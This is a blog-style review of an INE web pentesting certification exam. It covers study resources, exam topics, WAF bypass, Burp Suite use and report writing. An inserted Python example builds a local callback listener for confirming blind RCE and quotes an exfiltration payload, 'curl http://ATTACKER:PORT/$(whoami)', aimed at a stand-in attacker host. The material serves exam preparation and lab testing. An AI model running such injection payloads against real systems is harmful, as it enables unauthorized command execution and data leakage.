I don’t think I need an introduction of myself for those who are reading. I have been working as an Application Security Engineer. I found it much more challenging to work in application security than as a network penetration tester, but that’s just me.
Let’s talk about the exam. It was hard for me, maybe because I didn’t really take the course and didn’t have any INE labs to practice on. I bought the exam voucher in the Black Friday sale and thought, why not give it a try: maybe I’d pass, or just fail and lose $200.
For practice I did a lot of vulnerable apps like WebGoat, Juice Shop and the like, and it is also really important to understand and complete the PortSwigger labs.
I completed the exam on the 5th day. I had a lot of difficulties while trying to find some of the vulnerabilities, and yeah, to people who think that web pentesting can be done just by running a scan: sorry to say, you will fail. Scanners didn’t show anything at all. Most of the things had to be done manually.
Some exploits are straightforward; with others you might have to struggle a lot. I know I did. Maybe I’m not that good.
The most important topics include, but are not limited to, JavaScript deserialization, Java deserialization, PHP deserialization, SQL injection and many more. Keep in mind that you have to bypass a WAF, so be prepared for that. Be familiar with the OWASP Top 10 and learn how to exploit manually. While exploiting RCE, remember to always check the incoming traffic: sudo tcpdump -i tap0 saved my life.
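The tcpdump tip above is the out-of-band check for a blind command injection: when the payload produces no output in the response, you make the target call back to a host you control (tap0 being the interface the lab VPN puts your attacking box on) and watch for the hit. The listener below is an added example, not code from the original post or from INE; it records who connected and the first request line they sent, so a payload such as `curl http://ATTACKER:PORT/$(whoami)` leaks the command output in the URL path. The "target" side is simulated on 127.0.0.1 so the script runs offline; the host, port and the `www-data` token are constructed for the demo.

```python
"""Out-of-band confirmation of a blind RCE payload (added example, not from the post)."""
import socket
import threading
import time
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote


@dataclass
class Hit:
    src: str            # address the connection came from (should be the target)
    request_line: str   # first line the target sent, e.g. "GET /www-data HTTP/1.1"


def parse_request_line(raw: bytes) -> str:
    """Return the first line of the received bytes, decoded leniently."""
    return raw.split(b"\r\n", 1)[0].split(b"\n", 1)[0].decode("utf-8", "replace")


def tag_from_path(request_line: str) -> str:
    """Recover the token smuggled in the URL path: 'GET /www-data HTTP/1.1' -> 'www-data'."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return ""
    return unquote(parts[1].lstrip("/"))


class CallbackListener:
    """Accept TCP connections, log source + first request line, reply with an
    empty HTTP 200 so curl/wget on the target exit cleanly and leave no hang."""

    def __init__(self, host: str = "127.0.0.1", port: int = 0):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))      # port 0: let the OS pick a free port (demo only)
        self.sock.listen(5)
        self.sock.settimeout(0.5)         # lets the accept loop notice stop()
        self.port = self.sock.getsockname()[1]
        self.hits: List[Hit] = []
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._run, daemon=True)

    def start(self) -> "CallbackListener":
        self._thread.start()
        return self

    def stop(self) -> None:
        self._stop.set()
        self._thread.join()
        self.sock.close()

    def _run(self) -> None:
        while not self._stop.is_set():
            try:
                conn, addr = self.sock.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(2)
                try:
                    data = conn.recv(4096)
                except (socket.timeout, ConnectionError):
                    data = b""            # a bare TCP connect (e.g. nc) still counts as a hit
                self.hits.append(Hit(src=addr[0], request_line=parse_request_line(data)))
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")


def simulate_target_callback(port: int, command_output: str) -> None:
    """Stand-in for the vulnerable host running  curl http://ATTACKER:PORT/$(cmd).
    Constructed for this demo; in a real test the target makes this request."""
    with socket.create_connection(("127.0.0.1", port), timeout=2) as s:
        s.sendall(f"GET /{command_output} HTTP/1.1\r\nHost: attacker\r\n\r\n".encode())
        s.recv(1024)


def demo() -> List[str]:
    """Start the listener, fire one fake callback, return the leaked tokens."""
    listener = CallbackListener().start()
    try:
        simulate_target_callback(listener.port, "www-data")
        deadline = time.time() + 2        # the hit is recorded before the 200 is sent,
        while not listener.hits and time.time() < deadline:   # this wait is just a guard
            time.sleep(0.05)
    finally:
        listener.stop()
    return [tag_from_path(h.request_line) for h in listener.hits]


if __name__ == "__main__":
    print(demo())   # -> ['www-data']
```

On a real engagement you would bind to the VPN interface address instead of 127.0.0.1 and keep tcpdump running alongside it: the listener only sees completed TCP connections, while tcpdump also shows ICMP from a `ping -c 1 ATTACKER` payload and SYNs that never complete because egress filtering blocked the port.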
If the exploits don’t work, try resetting the environment. You get 4 resets every 24 hours. The exam environment was stable, but as I said, you might have to reset in case some things don’t work.
Be prepared with your payloads, be familiar with Burp Suite and try to get Burp Suite Pro, because you might need to use Intruder with the payloads you have. I know I did, and thank god I had Burp Suite Professional.
A bit of scripting can make your life easier. You don’t have to be a pro, just have a general idea of how to do certain things.
You will have 7 days for the exam and another 7 days to complete the report. After the first 7 days the exam environment will be disabled, so make sure you have all the screenshots you will need for the report.
The report needs to be very professional; it’s a pentest, so expect to write a full report with all the screenshots and a detailed guide on how each and every vulnerability was exploited. My report had 85 pages.
I submitted my exam report on 10 December 2023 and got a reply on 4 January 2024. It’s best to forget about the exam as soon as the report is submitted. I checked the portal and email every day just to see if I had passed or not; it was stressful.
INE responds only from Monday to Friday. Saturday and Sunday are holidays, so you can’t reach them.
I want to thank Johnathan from the INE Technical Support Team – Tier 2 for helping me out with some problems I was facing during the exam. He was really helpful and really fast at replying to emails. Excellent work, Johnathan; I hope you get a promotion or a raise for your excellent support.
I guess that’s mostly it. The exam was worth the money and time that I had to spend; it was hard, but I loved everything about it.